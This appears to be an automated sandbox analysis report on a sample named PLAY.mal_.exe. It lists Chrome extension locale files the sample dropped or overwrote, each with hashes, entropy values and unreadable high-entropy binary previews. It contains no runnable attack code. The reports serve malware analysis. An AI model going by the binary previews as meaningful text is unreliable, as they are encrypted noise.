Rdq...~.K.2lu}Y....\..6...}...=<@.y.v>...g.f;..oW......XU...........\.y$E...9.4.>\`..C........1......P..!..0...)M..4......{z:*Q.P.Rr.\...u.u%*'d...kG.@,<..5.k..B4.2..-'...u...x..a..!.D.a...."{..&..L*..e..!...(z.V..+..7.8*.Fnek.2KO(QR..vw}%..%..k^.......~...K.Roz.".Gt.....r....T..U.|.!.I>..........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\eu\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.8893132963292
        Encrypted:false
        SSDEEP:
        MD5:CCCBB8B9721AE19D42686F72632A1198
        SHA1:BE1756A47086C334630120882F588F2D66D359DB
        SHA-256:1F2ECC428DBB4B522D4F91A5714F3D04EBADCAFF9082565C2E2ECEC0D70CDED9
        SHA-512:C98C678D4E163FF8CB029386D61C80E504844CE4736EC50DBD996B1A93A6CDB607F1FAB037E830E714C871C9AE33F4BB6B40A3C2BD2C9D0304657EC52B604C0A
        Malicious:false
        Preview:Zj.N1+..S.5.J..,..........S.X....W....X...3....O.r....l.j.......q.Km&.:L...t.S"....gB...^/.)......,#.w..+..5%@O..8. 5..^..i...!.G..O..ag}......#.......R...{X..M .I.b...u.A.U..QSh.\Z..U.t...Og.x[GHF.f..../.;.k..D..\.......'...E......N.,?...e.R....../.J...".q.......O;...K..P..q..7...9.y..O.9..SX.........9}.....%(..J`.}..x..'I....n^.6x..b...2b.G...t...K..&W........+.....%:6..`.P....[....Q..SkO\Rj...J..r{...s...h.j...2..g..hQ.f...................tq.....X0i.bY.B$...I/..4.2.|.M....~....WN.c........@.a..z[.g...-....OX3..F..s..y.4]l.V.]........cdp.f.<...........I.......c..+..b.v.AUc..'5T..g..!.6......t.....H.....R2...P..>|(.(..Q......d...}.cw....?.La.............V.-.IG.. >...lRP.t.N_.,....K=...O.....i..F..-.zc.l.........sS..b...;+s...P.YU...).....2G.3B.<....^.r.3~...>~.z..&.Q...............T..U.|.!.I>...........................:$i.1r[..I.t.."/.'}.Y.dgn...C...fH.m.+%+.<W.[.W..H.F..5e-...'E........}..v.R...*p.C.M.0hL..l...`S|....i_

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fa\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2376
        Entropy (8bit):7.915731973048769
        Encrypted:false
        SSDEEP:
        MD5:0F9EA7095D5AD76DE756B248A7A34D81
        SHA1:2B6A34370CD6515672C4EB9FEF6CB233BC35BAB2
        SHA-256:A6DF9CE4846DAFC90DE2C0AE00BE926280454B5BC8F5FE9E17EA6C3C1ECA6646
        SHA-512:6F84F42180E8145B28FD88180EC261E6BF2952EB9E1B358D13822A3ED3675D2AD748197A43686060DD143DE70163737F0387344A1F8B1B541DBFD7209C77A167
        Malicious:false
        Preview:....(...h../...t......D.v~.WA..5..3....26.."c..8..G...$"=..To..njhe.a>./`.CBP..QI.....j....PX8......-.Fzm.s...A.T..N...:.!...S|bR.?..c.|.w....&..+O4.....Y........L.O..u.d.<...O.....u.m.3.}O.Ek.]...2%...I.{[S..?...M.tV;....1?)..T...)~...g)...IeI.|..>Y..o......<.H.....v.D.g~$S7'..x....B.9H...}..r|d..!.WG..O...q....|.<&....!....$o.T....,&...:3_...2...:.&....,...5.]..b.'..9.ZfqR...T.........N....c..>.+.tU]i4|..D.[.....T..Z.^...,$..-F...Z.Q..G..6#....0..\_..O..f..t..T.6..[u.#..C7.$?..9..k.{.Z...Y.".+V.u<.).L.T...U%..aw.\r..~O,....8<4j..w.L|q..bEn.....X..`..jW=..5..eE.9..h].....S...xD..&w...T6.:..4..cy........>;j9V.w.!i?.....-..}.jD...]|........0|...N.7...uo..*.........1.Y....D..E..8..|".Q..T......j..Gm.y...o-.(.\.R.S /.:q..y.w.P.3L..C9..;..a.aQ,P...|.L.a(...%...xz.F?%_.+..@..*6..|.s...F...1s.X.....p...L!.I1b....).)..E.z..Et.....<1.9.;...t.z...hh...@^...Pt..5{2..%.,%..z...@.......S ....>.~-A...Zl1.jlg..+.#.\n..o;.t..>z......J.....g.....<.]`9...;

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fi\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1976
        Entropy (8bit):7.889559005331434
        Encrypted:false
        SSDEEP:
        MD5:ADEC0037713F6094D320ABE2990B89CC
        SHA1:FFA3054B0EE447D5E23930DAAAD4F423B7207EFF
        SHA-256:F1487665A141FBDB31961A810A78626888FD2886D695040FE25674378D912A2A
        SHA-512:7EE6BD9819250DB32361936C7061ADD45A3735DFE82CBCB20BAFAB114340169ADED7DDF5C944BD83CF891AED90F35EC367F6C3F7B86A9BABFA6B32DE710E0C47
        Malicious:false
        Preview:....;<Z5..).*....+..........x.V...t..`8..u..vdrS@y.4l...p..1.i.....P.u._~t.B.D.\.(.........`.*..&y........+.2>)G.....N.). B~H.J"J...f.V...?w.....h...{..[...C...0.....6.La..........l*...]...@..../....'d.... N..K.j.>Wr..........+..uKV..;.y.&.E.;*..K.p]...v=.......!Q.f......u...s.p..EF........P..T....9,_.......9@.,..e..!t.).#.....6.`.w}..5..^W...a..t.k..g...rce...G.=.`t......)....^.\f.rSU.._..........(.=GCu...}..z...^9.=...G8..c..y..0.|L...8T]n;3...{......*.6H.N-..}yd<.'..V....&..r.n{._..v.m..{ ...cJ.O.^....'....a....w......!..../.L.....2.<.i2.....-......&K.....6c.>..e....D..d.Y4.!.NW4]3B.R.._..P.^...C.._.f^....k.... q...q_..8.........N@t..wX...Ch....p&.......=h?`A.I.d<<w...K...OzsM *...V...T)u.E...X...[..9.{_.$5.S.{.UZ<._.k.IM..;.^... .6.t(.Ml.4.......5..g[J..........._...&...K..".......b:6=.M..2..6}....3.............l'...Y......8...{....#<.....'.c.M\..e?Ct.......T..U.|.!.I>..............................>I.D.r.Nh.1..........rg..&y.z<....Bj...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fil\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.907983802331716
        Encrypted:false
        SSDEEP:
        MD5:EBF4BAD16EA0E532B6230A04883BDAA8
        SHA1:0B6BB80DFE6287BCF4ADAC41C6F6DAD68A2BBC9E
        SHA-256:1D911B36270714D4266444A15DA380B553E0530212E7EF356208BD68FD51040F
        SHA-512:F301F6702BDBD7451D06E3327383A220010ABE55507A839D0593F7F362316C7E1DBDE1D23C0897E38D1537FC09164E1634A3D0730B34998FE9DC19C1BFCB3573
        Malicious:false
        Preview:..[........o.....we..|6.cQ..m...0.....)#N... G.s=..%....wz..........r../..Q+.H.o.F......u8._\7F.H......^.cK.t.>.o.V1i..p......w..\../..s.....3..7..l.W......H...!..:C/.]y:.^b....n..._..i.j...Vk..N{..m+..e.Lw0.H.y..:>.Q..1w..75.9....x..y.w...XAg[.~.P..W._%.. .I.{.q...L3bG....C......L...<....o.C..iD.`...Z.....?6.&([.....B!zD.[.8....`............{[..dp...&....;4z..d....Aa...rT....2h.Xdk.B..q.V..>...."M..|....<.i..........(].#....v..Nz..B......Ic..P..~..~.7..lCz.....T..j..Kds\%OI.........vn........).......}..~|.K~........A...V...Ln...5w.......)XP....z....;.....J...7.D..7.......X.].b..?.a._...3....-..._..q!g.YT..~..>.p|.0p.t.d._L.......G...vzT.X./.u.&.{p.<....E..UO..li.O.I...../.9.:..?.....3.0R.....ykh.C..t..."...B_l.KI`.h.Gg..{..=S..4..#p.^[n]zl...............qM..$.OQAYx.]C...:..B.es0...S?....0.=lMb ...vD..n+d..h.....K{....e.....{v..*N...#.......?k..4kn.=..,.].....U.*.y.A...,.....].......)..Sk.d.V.+....T..U.|.!.I>..........................

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fr\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.900953709777779
        Encrypted:false
        SSDEEP:
        MD5:539BD85A361CFEB43B996B6E66A37911
        SHA1:9A5182D335944555497DC06363C2DBEDD68EF206
        SHA-256:080913FC7E94BE8D64C9B3D18DC3AA4E5F861034590EF5647876F9090F8B3D7C
        SHA-512:6D5F53C76C2D1BB1CF9A86FACB0BBBFE1B673C3DA9D5CA0F9CD4BE8C6BD8B5B4D47A24D575724E9F7497543BEEDD3007E05C90F98A56A4A8F255C023A0F77121
        Malicious:false
        Preview:.oe8...T.....U..Y.....X........K....]....=\cI..~..T9..O.;..~.Aw$:g?....[.^..Hh.....%.7.>...i.c|....e.^.O...k.h.o.)..'Y.dT......2....&/.r...c.^....%.."..3....K(..._...Q>.^......d....`6.....n..!.R.....h..[`>^...?...Zc" ..aM6..+I......<:.0..$..l..T.]$......H.....|..2.K.....YM....s....'c._`.}....U.l..8I..x.P.)............Q.z}.......J..(.b.....1`t.%..!.e>*.!.C..vq.#l.$.i.<..5..6....D.!.,P.....O\..3..r|.,P..s.j.f....}Y...w.Yw.!.h..F..........S.5p.....Tl..3.FH.C..7..4SB..T...._..0.......\....L.mA.O..!.,.{C..+..Y...=..,.X.%.VF...%..i.....Aq................hJ.....)].<.E..E.g.B>.@..).....7...U... .j.(..R]..s.p..G+x.?.....K.=.k..tn..9M.....\..<oKq....?LG/"oF..9}i.J.k..k...LA...s.q.,vu)..q..U.?....$.2..z.G.=Q.!.....w)...h....0E......O.sO...v.KAG.05.8.).....f.7..He.5........5n6...N...b....s.%........!..%YD..YB.h....?s:.k.V..]|......F.+..;.?...&C..>.i}...s.uU9/.}..."..........T..)9..M.8.|..../n.,.!.).f....!.....ps...3.=,..p....)DNX...T..U.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fr_CA\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.889089329817689
        Encrypted:false
        SSDEEP:
        MD5:CDA8D0D954EED369BE26B1FDF95896DB
        SHA1:7C13B1176DE74BEA7E1501D3070EF3DC48CF9C12
        SHA-256:79ECAEE461EE7ADD42B3FECD1495E8F260207F9E83DE2EFB4E2CC6CC6B964DE3
        SHA-512:EF9D25F1AE16A23D8E9871CD93807C737325A177EC78DDB0757DC510A45A0B35626264A516049F49A36372E455F83EDE90C0FF8CF44DD12D0021E0840A2FA82E
        Malicious:false
        Preview:......?.....T...w.x/3...o....+.d.....m.5...Sf.R.2e...e.}o.;....S....b.......b.;.o&..n...u.1.Y ...0..m#....8.^.O$`..DS....@$;5...W...[Y....+.j9.....LJ?..........M.QN.w.......w'<...s~......"}r..S..1[....A*.._.....j..N..PW[.O~s7....=..d1.g..(x.|..f_N'!..n..5......k.n.?.)..&.r....:...\75`p,a.X...63...a$~...n{...i....m.'Q...u.....D....R|.J.P.8>n.0..>...3..1;........x.6..t........Cy .JI.D.............D....A.i^.&.<.b.|...d...M[..5.IP3. .%.x3.(..........O.jb._....yA.B...k..s@;...-.@..Q..y......@.../.L.E+H..y/...IW.#..T}.x.HXM..O.'.....&A...'..}.f[..~e.[.".I.p.MO.;..._8.`..@.:... ..!j.Q..S.<.n.rI.u..oo..]...?o...U.:.A.A=..@eY3)v....W..$..EA..............).W.2/M.,p........V.>.e...:.'SeFQ...p..c).;..R.I......}Xh.r3....5..[h|..Q...:..\Y@v.\...[e.r.......2.o.=.......]0......8w..~.=5......b...A...=......$B..z.8.R...XI<.....M/K.%.:..q.....>.u...<..o.n...f.x.............<{..._*..@4x|.]....1...)..rc.k+)..i.%h.u...'..R..|.....&.."....T..U.|.!.I>..........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gl\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.896815903100429
        Encrypted:false
        SSDEEP:
        MD5:081DB788E44C5398C16FC00F351A310B
        SHA1:4FC430AD3063BF23BB25AC69DD96857EAC998035
        SHA-256:764425FEF44374639F990989375B2B144EB16470D353D4C9495C3A4250CE24FC
        SHA-512:14CD682DE1BFE39E61FB0004ACF9F55B88AF1E1DAD420D718D006745A460FC083DD21F21463EE98A0C7BE5D6CC31A4F2983AECADA2B4B661B314F8B90BBF323E
        Malicious:false
        Preview:b....I..M..Z......`&Q.48h.Z&:...W8....._..0.q.)../.7...5.._...u..e3...}.H.......]:....{.g3....O....E(,...L8...]DGWtUM.lV.........$.......G...M.$Vr(K..G...a_.4.{I<.C>...{..\.<.}.....5d.Y\..:..\.R..o1.8.....D..G...;.s..e.U...}Z)9.=F.tV~<.O[.A.(.Rn...G..f...g..r./;.M..$.'... ......tF..........Y..gCW8{L'`...?.?..FEh-X.E.3L.o. ..+c...J.^.az?^"jDw.....bf...T..8....R..C7.-..6.-...t.v19.....P(>...a%......r.s..........._7~....f..Y....QG..-.>.e}]....^.s4&...Q...P...A'.9f.:...+}.L........L...d...i....N.g.GNL..M...Fo....^.....?V..A....!...p..s..s.....%.sP.I....mL.K.a..\&.....zg.5n$.b.m....{G...=.G.....$i`m........mp.?.j6dF...fTQm.....<...W..P.....y.......?T.#.Ml<.0.6f..}Z..{.0^7...I\W.C.e...#......].HC..E....I.O.@l.ODg.y.:B....SL.r..j.:.mM;S.....k.U....L..eLc.....S.[u.E>.^s...g...a...6z...@.9.4x^h.4.....x4{\$.u.L*.C........i(v.e......3..4'>...YP...S..J.~#.x..$3.<.n...Z.S....7.C.5.....%.-U.....T..U.|.!.I>..........................J..3...[.z..Z.......*.}#.u.J?d

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gu\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2728
        Entropy (8bit):7.92189234050074
        Encrypted:false
        SSDEEP:
        MD5:D511E32909BAF967D1545A6821438949
        SHA1:BAF76F92A0A9EB3066148AA30E0D494F7E1DD988
        SHA-256:7B06DDC08F58F101410612122FD050FD4CC303B0488DD88F2745B32F1039599E
        SHA-512:515B1752E85172C5881FD274D1BC3232AD514F330EB6502E53F1E22AB317955B5FE0E25AE808F4B3C74E65B947B4CE702913A75D82F99D3FD570D187FFDED11E
        Malicious:false
        Preview:.L_Hi..b.D.........7c..J.^.$...`:.T.xt$...|.......>.x..[u.P8Q.P.`.T.....mQ..2....;..!.,..d..h.#..c.,.....Y3Z..nRq.$r..r.......(..z...../.:....i.m...UH.r...G..U.......AKUZ..Be..8w..dA.a..B.pb.W .._.O.N..!..._&@.a...X....A..c6...B.U.t.'N>&~..26p...w.{2p.4m.b..[b.u.G0...Q...H...l3.S.U...";...3..:+...C.r..p1s..Q...J..$iO.....0...c...E....u.k>a....E5.~..j.%j.i2I,....~...u......2.*Vh..t...-.JV.E.p....H..r.:7.,...1...+T.9'Nk......9{kL.<...xk...bo.mrTpYN..Y...^7HCq..=.XEc.X...q..1V...`...d..)6..u.........D...zM>.H..c.,.uC.V.M.<Cv.J.b.w.Y.ke..v5."A%..|._..7.........B"*...@...@X..HEF/...p.V..J.,...c..A..@.$<...Pa...lh.;.>..T.C)...C..D.%.5...e.9/{qs.h.2.,..Js..f....(....,..[,..*.3d...Z....U.V1...8.9I\.U.!.(...h%s.3..lqn..#...v..a.}....{J...3.l..L....`.M....*.8k..R<...B..U.. .Th9?..N.7jG`.G*...BbNa ...$Z......']...C}....T....#......1..Y.O...._...3.....|..S..f.?E...W.#.B..L..]Z....a.j.e.7<>3...$...y`.\.7.g_(."'.+e.. .~.%*...}......A...l......xI.......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hi\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2744
        Entropy (8bit):7.929562350338682
        Encrypted:false
        SSDEEP:
        MD5:B5821834ABC982EEBDE7578A13B58FB2
        SHA1:1A3523F71253F17B56C7528905A31264558DD195
        SHA-256:3015A4CDB60E25CD96A580260DDD4393915F28060DFC94E388EE2DD7A270EEA0
        SHA-512:CA25E46F051A3BF347D6BC2EE953B82AAF940C433FDFE59677139F05B7BB0AE7687FCB0F0E5433FFC6563DE4DA4E897BACEB2DC3B21C1C6F0254E338A39EC7CE
        Malicious:false
        Preview:.?..G../.....Yp.&.iq.......e....^..J..1t9./a..E:w.\0oi:_TJ..P..o.........NJE.(}.!.8.,b.9.-.a&.b.{pa.f...t.rlU!...K&i.$....y.6B..(.[Y."....t...v.Q6...6Y..`NY_-........W.........U.....pt.)."M4..B..........C..$....wa....!K..h@...\.../....<(...9.n.L..f.I.D.6$|.....|.o.(.Knj.K...6....1..^....P.u`..E.o.w..rs}~7.G..f.........m....t....}[.....=...zZA..L{V%..7;.m...uBI:..O)..n.z........Q...........z7..m.8..d...Px.P.8...Kt}......',.....F.`...C.L).T..Oi,.......o.L...?..X.......fw...e.....4..%#../.I.k..n.,L..j....`W'...Eb..s.E...*.....H.Rl.6......'...x.k....nRL...W.S.izn....y.oi9I.#1u.Jy.:..Pi.z......V.V.W..Y.w\U.Mr.t.*.f....%...\..W..iA+..b&OW}.5.L..FE..._..?...J.v?...|n._8...QI..g.....I].I.r..N.......L.I.W.......>1...J..l.3...~..Zd.U8.,....c..~...]5....>1dL.~(M..1EZ.Q,..W....mUE.T?W.... ..=+..{H..M.@a....J&.*..,..0.j...T.y...'.t.E...1J.X._!..e.>..AoZt.........li.x..Y.....c..Z.H3..=...B.f......y...e...B...l.B...}[..V.....5.w...X...(..G.! .......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hr\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):7.887291271351303
        Encrypted:false
        SSDEEP:
        MD5:C4FEEACAC28160366CB9C507E4BE4D29
        SHA1:37CCFFDC00E9AE7F1ABCAD8D78B824938062EE6B
        SHA-256:681C8AE492676A8A14E22163674CB3DEB165C274F58FC79678DC410FAD5731EE
        SHA-512:EB677A865D866D36D04097FDDFBE99D26D62265F28CF524EBE17714C127648A5C388D2E8EEE8E7D16C2A2F9D81050D05E08D34C23DD9D36D411AED7DDC4829FD
        Malicious:false
        Preview:.0k..'r.0...SS..I.~...U.jO...S...)...0..$....'R!....m...(...Q........d............. .U.W)..Z.]D......Y #.|..Yw@.....'.;.........P%b..l..J.n#....L.hD...CC..L.i./C!T...Mk......Z&LPw..A&...4....D?..c)~wr....T.Hk..Yna._..^.>..\......N.n..B..`<F=.6@..7_f.....:N..fe=..+.[H..r..@_.........|]o".......||..y*>.b. .k*1g...ud.KA...b....tW...]*^......%..y.T....v.lK...^.vW..X&...4Yd..*.-.-.......g.@..C.,..]r.a.>a...V......".....x'......i.......gxeT...iC..I.... 5.<.F.DGf......R|..V.Y....Qb..<.Q.y..w.*M....Z..%.A..4...Y*..MFviG.....|N.}..x..G.v...R..a.`...."b.A....:.KkF..i..Ge[.}..F.w.~.&K.....#....o..X..S..;.9...D ...{....B....n4.q.B....2..89C.].O..n.4B..$...P.wQ@.8(K.9..L\..|.q...Wr.Bj.bg.g..,".d...roi=.[..m.#X.....`.$.I.x....Z.R.(.@.L..X...[..KO..i...t........09...5#\..P5Cb...z..J........,...........JQtd.%.7>).+.$..4.I...]..u@....-'.m.Z..X].. ..)........6.,.. .%.D...B.~..X. .7...Q......n......T..U.|.!.I>............................Pn...8.9.wN?.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hu\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2136
        Entropy (8bit):7.909179871778225
        Encrypted:false
        SSDEEP:
        MD5:1101ED69329D8D61542E2C8A17F5D747
        SHA1:FAA2E8008F8ECAB88922D44F67E928B05A623BA6
        SHA-256:CB5700AFF90D451A8EDC54E48CED211AD1605622526318011033D02C788A6049
        SHA-512:6B3717D0789A831521FB225F666BD0675170A12890ED98869B16B09E48AA27A39F24EE9AD1A9BA0B37DA9AFF4356C9FF6CFC21EB8A7DDB71DA66049136F679DB
        Malicious:false
        Preview:.O.;.v.~j......`.G......`..$.....+.M{...z.'=e.u.Wq.[NCG.cuA.r.*..z;/....U...V.....ikMb..u.......J...A4Y.43B.....L|U6........%jj......t.2..4..c.{).._tQzG......XE*.Q.>.4...............l\....\....q.."Z#.]UY....`:..J5.W.Y..X...B....n.......>...5DVOwx...S.....h........i..........0d~..Tg.....v...W.z...'....$.z-........d.!.........$.....4.jQ..4....x.uq.BuY.W.TM.')z....$:.5.BG../.....{.S..x=8v.. 8.RX.\.v.Zt.....9?;._...T..|....g.|.}s....Z..gc..Zt..-...c..LS...+........5.(..P*.QH.n...]Wzc>....)...5..:.N..j.#8"f..G:..>. Qs.6p.1..n..T.u.<.....u.3.%6D+.H..-....p....W.P=jPAc..t...J.....h.....?....'2e...(.T;Y...O]b....a.tJ.Sg...@.....U$.n...`-../..D..m..&.B`...&.xg*u..n......;..5.q(S.~S...f..[....n....n.>".#k0..G..z.T.*..~Wu.........".|...../a."...R.........?'3....j.....#..R..p....d.......4Wd....#...4...{fR.c.E..b.,...N.6.....P.NV...{$V"..*....s......[.Ev...Z'=I.v^..........a.4;3.W.1n...^_.C5[".GhJ51.............l..:..vu..5M#.... .y.qu.....{..=

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hy\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3848
        Entropy (8bit):7.94682304107386
        Encrypted:false
        SSDEEP:
        MD5:DB8F2EF963863FD12DD164DE0B4C8C3D
        SHA1:BD580128C3A29C78E94554E5C53FEC81DA7DA263
        SHA-256:7719DC12CD23FE1384B8683B3AC75D5F3EA71A34740B0AF04CE35AC318FB9109
        SHA-512:3C7AB2E057EC617852925E5808D1EC39EB541C6FAE07D5E6F15CF6CD0F71193E8D0CBF69D9C7BBA2F25754BCC67F8CD59E59F7D429C2760C630D05D91304C499
        Malicious:false
        Preview:.T.e..ua..v..f..F.[mu.;$...7C...U.a..Q../._...Y..=.....H?.d.I..Vkv...%5g..#....4...+t.17.2...~|..V.7..P..M..o......h=..g.M.nH/....[..>.Ucu,ub .x:..;....vV.7`.....s.y/..T5&..S.X..D..5.....$*.ks.P...:n.k..H..n;lO.....tM.+...[...^..g..JD.=l.g}rI.....RU>..u}+...j.*.....O...2.}..T...!.....1.E5..t..~.CF...G.J....e.j..-.j..o..o.....T.P).|....&. |C....S.r..+_D.{.e.P<.....%A...-..^..F.. ...#.f.z..Y.f.Y1...\{x.,..q..YV,%.z...QG.M...>T....8.%8h.....O.R.B....*..M.p(..H............w(......\.%..m1./.oT.K8........A....._......P.`,a@+...49Hb.._P.tj..2,..-NR@....9.z..9....D.?........a+..N.(.OWp....A.p...b+C..KFW.q..R...^p;....q..c.....S{.I.e...{.O..o...V......h2..\...n.|%..#*h.o...T..Rn.>$...P..@...X.K..=HM.)..5.).(Z......b.9..p%x...l....../..W.-..u../.<v....7.Q\.ru.x.$/..xU.)v...z..=JLD~...XN.e.....S.V.-K..c.}^D.N...c<.V.w...F.?3...A.)..0y.,R/.L..E..t\..28Qy....2.d.)....d....:...f./^L.`.&....uR..N....d*..ZN....VPC..x._..eD..R.....u...8.r.+}i.[y.s.. .s.....@w..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\id\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.899951395885824
        Encrypted:false
        SSDEEP:
        MD5:B504B0A98B155DB27A6286432348040E
        SHA1:A2DF5DD9ABBE99F69B3DB6112DCE9D2567631F06
        SHA-256:778FED3BDE1464AC80A50FC7A674678CEFA135E8B0341AD563C8C5FD0DBD7C7A
        SHA-512:8830D5941DF63EE930B77FAA1205B91A61F977B4102FC44A45FD4739E1E1CB331A00F8912D3D136FCC253F6A9D99AB71C8B2FF373987B24961067A1DE6C6B8F0
        Malicious:false
        Preview:G.I.....Jz...S...|.@V.ei(....*.#J....e.qP..3..>..Z..9.S...w...h..ZD...I..>..6.!."'=.1..JA.t.}).kz....1./.<.&.-....,....d.wv.#.T=?s....g.....9.gG!u'x..WL.VS.Di7..<H.\.a.}.r.3..L6.5d.Ki...D..-.).S..aHl.>:...o.:..KP3+^..|..2....Gj..F>.wJ#.m.L..-..\..`..$..........;...~.G.!.W........:.n..h...0.T|@.|.....0.i.I.Q4....."......$f.!o..-.ih.kQ&......_w0.v.........(IO.=....L...K#.+.V.iF..*...K.?>..n...[..+.."5...>.0.eJ.9....[.U.........6k..`...8z>.o.G.#5a.F.p..f..@....MKu.J.%..P2..q..w1..5..../.....;.....uB....3..%m...%#'..[O...<.;.!..B.'].....%.\.3......AM..W..I..O6.....V.K.e.........?42e ,....b...P.Le.E..G8}.Ki.L.6.=(.r.)..B..W..Y...R.bg.w.......{.r..T..V}..Y...K.`...(..... ..0..).n....._.."..O...r...%.<.+......=..<sI.?%..:...j...j....Ow.w....5/flf....l..tu..d.>.`iq_*.....J.V....'..c...l...$6.2..N...h..I....L.....T..U.|.!.I>..........................@&.(.....j)..q..QI%.;O.."x...Y%+.tX...yC.t..L....q....H.....:.Z.E.#(.[1=.D..+......G.[@.g=..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\is\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.892026289541175
        Encrypted:false
        SSDEEP:
        MD5:871E03BA69EBCCE459457659E16B49A0
        SHA1:F5DB37A5E7306B0CE3D18DBB21C39222F55C77BC
        SHA-256:78352200554537766612AD517B2E0A5556A2357C1B70D43783E93440E3161EC4
        SHA-512:483392A0CCEE4FE0892ACA32B9F65724B2950E623A0FFBF7381CD8D76E39F98BA618CEFC89DF1C0DC0BC70FEE0CBC1B6E73F9B8B74B49E7A9034DE6A487883ED
        Malicious:false
        Preview:PP...R.|.4q" K.F8!.lV..W`.......f4.,r.K......._.{Q...em.e..v..J7ARC.....@].<N.h..$vB1.}._''...L7....d.b&DB.{.n..x|.!.....W.C.d....m..v..,A..v..).r..Y..b..r.*.7=.`..t;V.\..j./....o..=iw....8Q..fW.h{.=.....v..G.........."vt.h..kBnm......U.Z...E.4....%F]0..q..]L.~......k../..u.|...~NI....w[...{(.b**.cR.e3..~@bg..<u.(K.......AbJb.......J.......`...7.b+....*.-.j.E4;I.k....MdG..........g.H,..BB.g..C.!...n.c.C*-#.....$fnx.V...1...a......,6.S..a.hu.........bc-..x....*!Q...o...e^.q.>....I.J?'L1.&......QP....|...v..%.J..].....,.x..h.) .....2...Y...{...6>..!..f.)y..,2..M5...........c.J(..I{.J..&v3q......g..cF.$..b.._...0J....E.y.....+...Z;.[IL....1.!f.v.a5.....+......%......+..w._3.A"..c...d...p..J&...v*....0..TE~...a./4!q.....g.t..T.=.........YI......P..I..>iHP.!.......:..~.:.djJ.[.2_`r...}..;.a..8g?.4x.Bq}y.w.v.:.!l....h.%2.g..b..DZ.^.......Er.G..+...!...SaR..$..s......2.m9$q......W#.y.C......U[..........&.WQ....T..U.|.!.I>..........................

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\it\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1976
        Entropy (8bit):7.882487412210743
        Encrypted:false
        SSDEEP:
        MD5:4F0664F194DA7EF3610BD839197DD2AD
        SHA1:E527C58B90C1388C35A8EFF6AC1264D21E71CA64
        SHA-256:F4CF0A3A0D1D324BAA9B7ECD47867917DC1E7A8527A6E7D958A614D87A750904
        SHA-512:6A4A6B8A74327375477BBA32412FBD60CB55935E1912305091C2EF53C0B8F3BDA39F118CF4A998BE1EA7288E9DF5C91407D826E2B4677509EBA557F5C34C82C1
        Malicious:false
